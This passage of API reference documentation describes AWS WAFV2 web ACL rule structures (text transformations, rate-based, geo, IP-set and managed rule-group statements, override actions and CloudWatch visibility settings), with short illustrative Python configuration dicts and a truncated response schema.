Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
ComparisonOperator (string) --The operator to use to compare the request part to the size setting.
Size (integer) --The size, in bytes, to compare to the request part, after any transformations.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: \ " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol (<)
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh;, with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn;, with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
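Tying this to the 8 KB body guidance above, a sketch (assumptions: the matching rule's action is Block) of a SizeConstraintStatement that matches bodies larger than AWS WAF can inspect might be:
size_constraint_statement = {
    'FieldToMatch': {'Body': {}},
    'ComparisonOperator': 'GT',  # matches bodies beyond the inspectable 8 KB
    'Size': 8192,
    'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}]
}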
GeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.
CountryCodes (list) --An array of two-character country codes, for example, [ "US", "CN" ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.
(string) --
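Using the example codes above, a one-line illustrative sketch:
geo_match_statement = {'CountryCodes': ['US', 'CN']}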
RuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
IPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .
Each IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --The Amazon Resource Name (ARN) of the IPSet that this statement references.
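A minimal sketch; the ARN shown is a made-up placeholder, not a real resource:
ip_set_reference_statement = {
    'ARN': 'arn:aws:wafv2:us-east-1:123456789012:regional/ipset/my-ip-set/EXAMPLE-ID'
}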
RegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .
Each regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: \ " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol (<)
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh;, with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn;, with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
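A minimal RegexPatternSetReferenceStatement sketch (the ARN is a made-up placeholder):
regex_pattern_set_reference_statement = {
    'ARN': 'arn:aws:wafv2:us-east-1:123456789012:regional/regexpatternset/my-patterns/EXAMPLE-ID',
    'FieldToMatch': {'UriPath': {}},
    'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}]
}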
RateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.
When the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.
You can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:
An IP match statement with an IP set that specifies the address 192.0.2.44.
A string match statement that searches in the User-Agent header for the string BadBot.
In this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.
You cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
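The worked example above, rendered as an illustrative statement dict (the IP set ARN is a made-up placeholder for a set containing 192.0.2.44):
rate_based_statement = {
    'Limit': 1000,
    'AggregateKeyType': 'IP',
    'ScopeDownStatement': {
        'AndStatement': {
            'Statements': [
                {'IPSetReferenceStatement': {
                    'ARN': 'arn:aws:wafv2:us-east-1:123456789012:regional/ipset/suspects/EXAMPLE-ID'
                }},
                {'ByteMatchStatement': {
                    'SearchString': b'BadBot',
                    'FieldToMatch': {'SingleHeader': {'Name': 'User-Agent'}},
                    'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}],
                    'PositionalConstraint': 'CONTAINS'
                }}
            ]
        }
    }
}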
Limit (integer) --The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopeDownStatement , this limit is applied only to the requests that match the statement.
AggregateKeyType (string) --Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.
ScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.
AndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .
Statements (list) --The statements to combine with AND logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
OrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .
Statements (list) --The statements to combine with OR logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
NotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .
Statement (dict) --The statement to negate. You can use any statement that can be nested.
ManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can't nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
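A sketch of a managed rule group statement with one rule excluded; the group and rule names here are illustrative, and you should confirm real names with ListAvailableManagedRuleGroups :
managed_rule_group_statement = {
    'VendorName': 'AWS',
    'Name': 'AWSManagedRulesCommonRuleSet',
    'ExcludedRules': [{'Name': 'SizeRestrictions_BODY'}]  # this rule's action becomes COUNT
}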
Action (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.
This is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .
You must specify either this Action setting or the rule OverrideAction setting, but not both:
If the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.
If the rule statement references a rule group, use the override action setting and not this action setting.
Block (dict) --Instructs AWS WAF to block the web request.
Allow (dict) --Instructs AWS WAF to allow the web request.
Count (dict) --Instructs AWS WAF to count the web request and allow it.
OverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --Override the rule action setting to count.
None (dict) --Don't override the rule action setting.
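A sketch of the Action/OverrideAction pairing rule above: because this rule's statement references a rule group, it carries OverrideAction and no Action (names are illustrative):
rule = {
    'Name': 'common-rule-set',
    'Priority': 0,
    'Statement': {
        'ManagedRuleGroupStatement': {'VendorName': 'AWS', 'Name': 'AWSManagedRulesCommonRuleSet'}
    },
    'OverrideAction': {'None': {}},  # leave the group's own rule actions in effect
    'VisibilityConfig': {
        'SampledRequestsEnabled': True,
        'CloudWatchMetricsEnabled': True,
        'MetricName': 'commonRuleSet'
    }
}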
VisibilityConfig (dict) --Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can't contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can't change a MetricName after you create a VisibilityConfig .
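An illustrative client-side check mirroring the MetricName constraints above (a sketch, not an official validator; the service performs its own validation):
import re

def valid_metric_name(name):
    # Alphanumeric only, 1-128 characters, and not a reserved name.
    return (bool(re.fullmatch(r'[A-Za-z0-9]{1,128}', name))
            and name not in ('All', 'Default_Action'))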
VisibilityConfig (dict) --Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can't contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can't change a MetricName after you create a VisibilityConfig .
Capacity (integer) --The web ACL capacity units (WCUs) currently being used by this web ACL.
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
PreProcessFirewallManagerRuleGroups (list) --The first set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can't alter these. Any rules and rule groups that you define for the web ACL are prioritized after these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --A rule group that's defined for an AWS Firewall Manager WAF policy.
Name (string) --The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don't need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can't nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
OverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --Override the rule action setting to count.
None (dict) --Don't override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can't contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can't change a MetricName after you create a VisibilityConfig .
PostProcessFirewallManagerRuleGroups (list) --The last set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can't alter these. Any rules and rule groups that you define for the web ACL are prioritized before these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --A rule group that's defined for an AWS Firewall Manager WAF policy.
Name (string) --The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don't need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can't nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
OverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --Override the rule action setting to count.
None (dict) --Don't override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can't contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can't change a MetricName after you create a VisibilityConfig .
ManagedByFirewallManager (boolean) --Indicates whether this web ACL is managed by AWS Firewall Manager. If true, then only AWS Firewall Manager can delete the web ACL or any Firewall Manager rule groups in the web ACL.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
